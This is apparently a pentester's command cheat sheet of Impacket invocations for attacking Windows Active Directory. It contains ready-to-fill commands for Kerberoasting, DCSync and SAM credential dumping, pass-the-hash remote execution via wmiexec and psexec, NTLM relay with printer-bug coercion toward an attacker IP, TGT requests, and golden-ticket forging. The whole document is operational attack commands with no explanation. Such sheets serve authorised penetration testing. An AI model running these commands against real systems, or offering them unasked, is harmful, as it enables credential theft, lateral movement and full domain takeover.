% kerberos,kerberoast,dcsync,samdump,wmiexec,psexec,ntlmrelay,zerologon,ticketer,gettgt,impacket

# Kerberoast: GetUserSPNs
python3 GetUserSPNs.py -request -dc-ip <dc_ip> <domain>/<user>

# DCSync attack (specific user)
secretsdump.py -just-dc-user <account> <domain>/<username>:<password>@<target>

# DCSync (example)
secretsdump.py '<domain>/<username>@<target>' -just-dc-user krbtgt

# Dump local SAM file
secretsdump.py -sam <sam.save> -security <security.save> -system <system.save> LOCAL

# WMIExec (with and without NTLM hash)
impacket-wmiexec <user>@<target_ip>
impacket-wmiexec -hashes <LM>:<NT> <user>@<target_ip>

# Zerologon via NTLM Relay
impacket-ntlmrelayx -t DCSYNC://<dc_name> -smb2support -auth-smb '<domain>/<user>:<password>'
python3 printerbug.py '<domain>/<user>:<password>@<other_dc>' <attacker_ip>

# PSExec with NTLM hash
psexec.py <domain>/<user>@<target_ip> -hashes :<ntlm_hash>

# getTGT (Kerberos TGT with NTLM hash)
getTGT.py <domain>/<user> -dc-ip <dc_ip> -hashes :<ntlm_hash>

# Set Kerberos TGT cache
export KRB5CCNAME=$(pwd)/<user>.ccache

# Use cached TGT with PSExec (hostname required)
psexec.py <domain>/<user>@<hostname> -target-ip <target_ip> -k -no-pass

# NTLMRelayX basic relay
ntlmrelayx.py -t <target_ip> -smb2support

# Ticketer (Golden Ticket with AES-256)
ticketer.py -domain-sid <domain_sid> -domain <domain> <user> -aes <aes256_hash>
